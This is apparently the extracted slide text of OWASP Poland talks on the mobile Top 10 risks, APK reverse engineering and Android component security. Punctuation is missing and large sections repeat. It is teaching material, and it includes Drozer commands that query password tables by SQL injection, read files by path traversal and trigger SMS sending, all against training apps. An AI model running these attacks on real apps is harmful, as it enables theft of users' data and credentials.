M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
